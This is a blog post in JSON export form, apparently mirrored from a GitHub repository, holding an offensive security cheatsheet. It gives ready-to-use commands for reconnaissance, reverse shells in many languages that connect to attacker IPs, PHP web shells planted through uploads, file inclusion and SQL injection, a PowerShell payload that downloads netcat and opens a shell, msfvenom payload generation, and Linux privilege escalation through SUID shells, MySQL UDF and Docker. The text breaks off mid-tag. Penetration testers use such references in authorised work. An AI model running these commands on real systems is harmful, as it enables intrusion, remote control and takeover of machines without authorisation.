{"id":65,"date":"2020-06-19T21:25:02","date_gmt":"2020-06-19T19:25:02","guid":{"rendered":"https:\/\/whatifsecu.tech\/?p=65"},"modified":"2020-06-19T21:25:29","modified_gmt":"2020-06-19T19:25:29","slug":"65","status":"publish","type":"post","link":"https:\/\/whatifsecu.tech\/?p=65","title":{"rendered":"Offensive Security \/ PenTesting Cheatsheets"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#reconnaissance--enumeration\"><\/a>Reconnaissance \/ Enumeration<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#extracting-live-ips-from-nmap-scan\"><\/a>Extracting Live IPs from Nmap Scan<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep \"\/open\" | cut -d \" \" -f 2 &gt; exposed-services-ips<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#simple-port-knocking\"><\/a>Simple Port Knocking<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 1.1.1.1; done<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#dns-lookups-zone-transfers--brute-force\"><\/a>DNS lookups, Zone Transfers &amp; Brute-Force<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">whois domain.com\ndig {a|txt|ns|mx} domain.com\ndig {a|txt|ns|mx} domain.com @ns1.domain.com\nhost -t {a|txt|ns|mx} megacorpone.com\nhost -a megacorpone.com\nhost -l megacorpone.com ns1.megacorpone.com\ndnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com\ndnsenum domain.com\nnslookup -&gt; set type=any -&gt; ls -d domain.com\nfor sub in $(cat subdomains.txt);do host $sub.domain.com|grep \"has.address\";done<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a 
href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#banner-grabbing\"><\/a>Banner Grabbing<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -v $TARGET 80\ntelnet $TARGET 80\ncurl -v $TARGET<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#nfs-exported-shares\"><\/a>NFS Exported Shares<\/h3>\n\n\n\n<p>List NFS exported shares. If &#8216;rw,no_root_squash&#8217; is present, upload and execute&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/sid-shell.c\">sid-shell<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">showmount -e 192.168.110.102\nchown root:root sid-shell; chmod +s sid-shell<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#kerberos-user-enumeration\"><\/a>Kerberos User Enumeration<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-brute-force--vulnerability-scanning\"><\/a>HTTP Brute-Force &amp; Vulnerability Scanning<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">target=10.0.0.1; gobuster -u http:\/\/$target -r -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster\ntarget=10.0.0.1; nikto -h http:\/\/$target:80 | tee $target-nikto\ntarget=10.0.0.1; wpscan --url http:\/\/$target:80 --enumerate u,t,p | tee $target-wpscan-enum<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#rpc--netbios--smb\"><\/a>RPC \/ NetBios \/ SMB<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">rpcinfo -p $TARGET\nnbtscan $TARGET\n\n# list shares\nsmbclient -L \/\/$TARGET -U \"\"\n\n# null session\nrpcclient -U \"\" $TARGET\nsmbclient -L 
\/\/$TARGET\nenum4linux $TARGET<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#snmp\"><\/a>SNMP<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Windows User Accounts\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25\n\n# Windows Running Programs\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2\n\n# Windows Hostname\nsnmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5\n\n# Windows Share Information\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1\n\n# Windows Share Information\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27\n\n# Windows TCP Ports\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.6.13.1.3\n\n# Software Name\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2\n\n# brute-force community strings\nonesixtyone -i snmp-ips.txt -c community.txt\n\nsnmp-check $TARGET<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#smtp\"><\/a>SMTP<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">smtp-user-enum -U \/usr\/share\/wordlists\/names.txt -t $TARGET -m 150<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#gaining-access\"><\/a>Gaining Access<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#reverse-shell-one-liners\"><\/a>Reverse Shell One-Liners<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#bash\"><\/a>Bash<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">bash -i &gt;&amp; \/dev\/tcp\/10.0.0.1\/8080 0&gt;&amp;1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#perl\"><\/a>Perl<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">perl -e 'use 
Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&gt;&amp;S\");open(STDOUT,\"&gt;&amp;S\");open(STDERR,\"&gt;&amp;S\");exec(\"\/bin\/sh -i\");};'<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#url-encoded-perl-linux\"><\/a>URL-Encoded Perl: Linux<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#python\"><\/a>Python<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#php\"><\/a>PHP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ruby\"><\/a>Ruby<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"\/bin\/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d\",f,f,f)'<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a 
href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#netcat-without--e-1\"><\/a>Netcat without -e #1<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">rm \/tmp\/f; mkfifo \/tmp\/f; cat \/tmp\/f | \/bin\/sh -i 2&gt;&amp;1 | nc 10.0.0.1 1234 &gt; \/tmp\/f<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#netcat-without--e-2\"><\/a>Netcat without -e #2<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">nc localhost 443 | \/bin\/sh | nc localhost 444\ntelnet localhost 443 | \/bin\/sh | telnet localhost 444<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#java\"><\/a>Java<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">r = Runtime.getRuntime(); p = r.exec([\"\/bin\/bash\",\"-c\",\"exec 5&lt;&gt;\/dev\/tcp\/10.0.0.1\/2002;cat &lt;&amp;5 | while read line; do \\$line 2&gt;&amp;5 &gt;&amp;5; done\"] as String[]); p.waitFor();<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#xterm\"><\/a>XTerm<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">xterm -display 10.0.0.1:1<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#jdwp-rce\"><\/a>JDWP RCE<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec(\"whoami\").getInputStream())).readLine())<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#working-with-restricted-shells\"><\/a>Working with Restricted Shells<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># rare cases\nssh bill@localhost ls -l \/tmp<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">nice \/bin\/bash<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a 
href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#interactive-tty-shells\"><\/a>Interactive TTY Shells<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\/usr\/bin\/expect sh<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c 'import pty; pty.spawn(\"\/bin\/sh\")'\n# execute one command with su as another user if you do not have access to the shell (Python 2 syntax). Credit to g0blin.co.uk\npython -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen([\"\/bin\/su\",\"-c\",\"id\",\"bynarr\"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,\"fruity\\n\");time.sleep(0.1);print os.read(master,1024);'<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#uploadingposting-files-through-www-upload-forms\"><\/a>Uploading\/POSTing Files Through WWW Upload Forms<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># POST file\ncurl -X POST -F \"file=@\/file\/location\/shell.php\" http:\/\/$TARGET\/upload.php --cookie \"cookie\"\n\n# POST binary data to web form\ncurl -F \"field=&lt;shell.zip\" http:\/\/$TARGET\/upld.php -F 'k=v' --cookie \"k=v;\" -F \"submit=true\" -L -v<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#puting-file-on-the-webhost-via-put-verb\"><\/a>PUTing File on the Webhost via PUT verb<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">curl -X PUT -d '&lt;?php system($_GET[\"c\"]);?&gt;' http:\/\/192.168.2.99\/shell.php<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#generating-payload-pattern--calculating-offset\"><\/a>Generating Payload Pattern &amp; Calculating Offset<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 2000\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q 
$EIP_VALUE<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#bypassing-file-upload-restrictions\"><\/a>Bypassing File Upload Restrictions<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>file.php -&gt; file.jpg<\/li><li>file.php -&gt; file.php.jpg<\/li><li>file.asp -&gt; file.asp;.jpg<\/li><li>file.gif (contains php code, but starts with string GIF\/GIF98)<\/li><li>00%<\/li><li>file.jpg with php backdoor in exif (see below)<\/li><li>.jpg -&gt; proxy intercept -&gt; rename to .php<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#injecting-php-into-jpeg\"><\/a>Injecting PHP into JPEG<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">exiv2 -c'A \"&lt;?php system($_REQUEST['cmd']);?&gt;\"!' backdoor.jpeg\nexiftool \"-comment&lt;=back.php\" back.png<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#uploading-htaccess-to-interpret-blah-as-php\"><\/a>Uploading .htaccess to interpret .blah as .php<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>AddType application\/x-httpd-php .blah\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cracking-passwords\"><\/a>Cracking Passwords<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cracking-web-forms-with-hydra\"><\/a>Cracking Web Forms with Hydra<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra 10.10.10.52 http-post-form -L \/usr\/share\/wordlists\/list \"\/endpoint\/login:usernameField=^USER^&amp;passwordField=^PASS^:unsuccessfulMessage\" -s PORT -P \/usr\/share\/wordlists\/list<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cracking-common-protocols-with-hydra\"><\/a>Cracking Common Protocols with 
Hydra<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra 10.10.10.52 -l username -P \/usr\/share\/wordlists\/list ftp|ssh|smb:\/\/10.0.0.1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#hashcat-cracking\"><\/a>HashCat Cracking<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Bruteforce based on the pattern;\nhashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout  \n\n# Generate password candidates: wordlist + pattern;\nhashcat -a6 -m0 \"e99a18c428cb38d5f260853678922e03\" yourPassword|\/usr\/share\/wordlists\/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#generating-payload-with-msfvenom\"><\/a>Generating Payload with msfvenom<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p windows\/shell_reverse_tcp LHOST=10.11.0.245 LPORT=443 -f c -a x86 --platform windows -b \"\\x00\\x0a\\x0d\" -e x86\/shikata_ga_nai<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#compiling-code-from-linux\"><\/a>Compiling Code From Linux<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Windows\ni686-w64-mingw32-gcc source.c -lws2_32 -o out.exe\n\n# Linux\ngcc -m32|-m64 -o output source.c<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#local-file-inclusion-to-shell\"><\/a>Local File Inclusion to Shell<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nc 192.168.1.102 80\nGET \/&lt;?php passthru($_GET['cmd']); ?&gt; HTTP\/1.1\nHost: 192.168.1.102\nConnection: close\n\n# Then send as cmd payload via http:\/\/192.168.1.102\/index.php?page=..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;cmd=id<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a 
href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#local-file-inclusion-reading-files\"><\/a>Local File Inclusion: Reading Files<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">file:\/\/\/etc\/passwd\n\nhttp:\/\/example.com\/index.php?page=php:\/\/input&cmd=ls\n    POST: &lt;?php system($_GET['cmd']); ?&gt;\nhttp:\/\/192.168.2.237\/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp:\/\/input\n    POST: &lt;?php system('uname -a');die(); ?&gt;\n\nexpect:\/\/whoami\nhttp:\/\/example.com\/index.php?page=php:\/\/filter\/read=string.rot13\/resource=index.php\nhttp:\/\/example.com\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=index.php\nhttp:\/\/example.com\/index.php?page=php:\/\/filter\/zlib.deflate\/convert.base64-encode\/resource=\/etc\/passwd\nhttp:\/\/example.net\/?page=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=id\nhttp:\/\/10.1.1.1\/index.php?page=data:\/\/text\/plain,%3C?php%20system%28%22uname%20-a%22%29;%20?%3E\n\n# ZIP Wrapper\necho \"&lt;pre&gt;&lt;?php system($_GET['cmd']); ?&gt;&lt;\/pre&gt;\" &gt; payload.php;  \nzip payload.zip payload.php;   \nmv payload.zip shell.jpg;    \nhttp:\/\/example.com\/index.php?page=zip:\/\/shell.jpg%23payload.php\n\n# Loop through file descriptors\ncurl '' -H 'Cookie: PHPSESSID=df74dce800c96bcac1f59d3b3d42087d' --output -<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#remote-file-inclusion-shell-windows--php\"><\/a>Remote File Inclusion Shell: Windows + PHP<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php system(\"powershell -Command \\\"&amp; {(New-Object System.Net.WebClient).DownloadFile('http:\/\/10.11.0.245\/netcat\/nc.exe','nc.exe'); cmd \/c nc.exe 10.11.0.245 4444 -e cmd.exe\\\" }\"); ?&gt;<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a 
href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#sql-injection-to-shell-or-backdoor\"><\/a>SQL Injection to Shell or Backdoor<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Assumes the vulnerable query returns 4 columns\nhttp:\/\/target\/index.php?vulnParam=0' UNION ALL SELECT 1,\"&lt;?php system($_REQUEST['cmd']);?&gt;\",2,3 INTO OUTFILE \"c:\/evil.php\"-- uMj<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\"># sqlmap; post-request - captured request via Burp Proxy via Save Item to File.\nsqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\"># netcat reverse shell via mssql injection when xp_cmdshell is available\n1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+&gt;+c:\\ftp.txt+%26+ftp+-s:c:\\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#sqlite-injection-to-shell-or-backdoor\"><\/a>SQLite Injection to Shell or Backdoor<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">ATTACH DATABASE '\/home\/www\/public_html\/uploads\/phpinfo.php' as pwn; \nCREATE TABLE pwn.shell (code TEXT); \nINSERT INTO pwn.shell (code) VALUES ('&lt;?php system($_REQUEST['cmd']);?&gt;');<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ms-sql-console\"><\/a>MS-SQL Console<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">mssqlclient.py -port 27900 user:password@10.1.1.1\nsqsh -S 10.1.1.1 -U user -P password<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#upgradig-non-interactive-shell\"><\/a>Upgrading Non-Interactive Shell<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c 'import pty; pty.spawn(\"\/bin\/sh\")'\n\/bin\/busybox sh<\/pre>\n\n\n\n<h3 
class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#python-input-code-injection\"><\/a>Python Input Code Injection<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">__import__('os').system('id')<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#local-enumeration--privilege-escalation\"><\/a>Local Enumeration &amp; Privilege Escalation<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#binary-exploitation-with-immunitydebugger\"><\/a>Binary Exploitation with ImmunityDebugger<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#get-loaded-modules\"><\/a>Get Loaded Modules<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code># We're interested in modules without protection, Read &amp; Execute permissions\n!mona modules\n<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#finding-jmp-esp-address\"><\/a>Finding JMP ESP Address<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>!mona find -s \"\\xFF\\xE4\" -m moduleName\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cracking-a-zip-password\"><\/a>Cracking a ZIP Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">fcrackzip -u -D -p \/usr\/share\/wordlists\/rockyou.txt bank-account.zip<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#setting-up-simple-http-server\"><\/a>Setting up Simple HTTP server<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Linux\npython -m SimpleHTTPServer 80\npython3 -m http.server\nruby -r webrick -e \"WEBrick::HTTPServer.new(:Port =&gt; 80, :DocumentRoot =&gt; Dir.pwd).start\"\nphp -S 0.0.0.0:80<\/pre>\n\n\n\n<h3 
class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#mysql-user-defined-fuction-privilge-escalation\"><\/a>MySQL User Defined Function Privilege Escalation<\/h3>\n\n\n\n<p>Requires&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/raptor_udf2.c\">raptor_udf2.c<\/a>&nbsp;and&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/sid-shell.c\">sid-shell.c<\/a>&nbsp;or&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/raptor\/raptor.tar\">full tarball<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc<\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>use mysql;\ncreate table npn(line blob);\ninsert into npn values(load_file('\/tmp\/raptor_udf2.so'));\nselect * from npn into dumpfile '\/usr\/lib\/raptor_udf2.so';\ncreate function do_system returns integer soname 'raptor_udf2.so';\nselect do_system('chown root:root \/tmp\/sid-shell; chmod +s \/tmp\/sid-shell');\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#docker-privilege-esclation\"><\/a>Docker Privilege Escalation<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">echo -e \"FROM ubuntu:14.04\\nENV WORKDIR \/stuff\\nRUN mkdir -p \/stuff\\nVOLUME [ \/stuff ]\\nWORKDIR \/stuff\" &gt; Dockerfile &amp;&amp; docker build -t my-docker-image . 
&amp;&amp; docker run -v $PWD:\/stuff -t my-docker-image \/bin\/sh -c 'cp \/bin\/sh \/stuff &amp;&amp; chown root.root \/stuff\/sh &amp;&amp; chmod a+s \/stuff\/sh' &amp;&amp; .\/sh -c id &amp;&amp; .\/sh<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#resetting-root-password\"><\/a>Resetting root Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">echo \"root:spotless\" | chpasswd<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#uploading-files-to-target-machine\"><\/a>Uploading Files to Target Machine<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#tftp\"><\/a>TFTP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">#TFTP Linux: cat \/etc\/default\/atftpd to find out file serving location; default in kali \/srv\/tftp\nservice atftpd start\n\n# Windows\ntftp -i $ATTACKER get \/download\/location\/file \/save\/location\/file<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ftp\"><\/a>FTP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Linux: set up ftp server with anonymous logon access;\ntwistd -n ftp -p 21 -r \/file\/to\/serve\n\n# Windows shell: read FTP commands from ftp-commands.txt non-interactively;\necho open $ATTACKER&gt;ftp-commands.txt\necho anonymous&gt;&gt;ftp-commands.txt\necho whatever&gt;&gt;ftp-commands.txt\necho binary&gt;&gt;ftp-commands.txt\necho get file.exe&gt;&gt;ftp-commands.txt\necho bye&gt;&gt;ftp-commands.txt \nftp -s:ftp-commands.txt\n\n# Or just a one-liner\n(echo open 10.11.0.245&amp;echo anonymous&amp;echo whatever&amp;echo binary&amp;echo get nc.exe&amp;echo bye) &gt; ftp.txt &amp; ftp -s:ftp.txt &amp; nc.exe 10.11.0.245 443 -e cmd<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a 
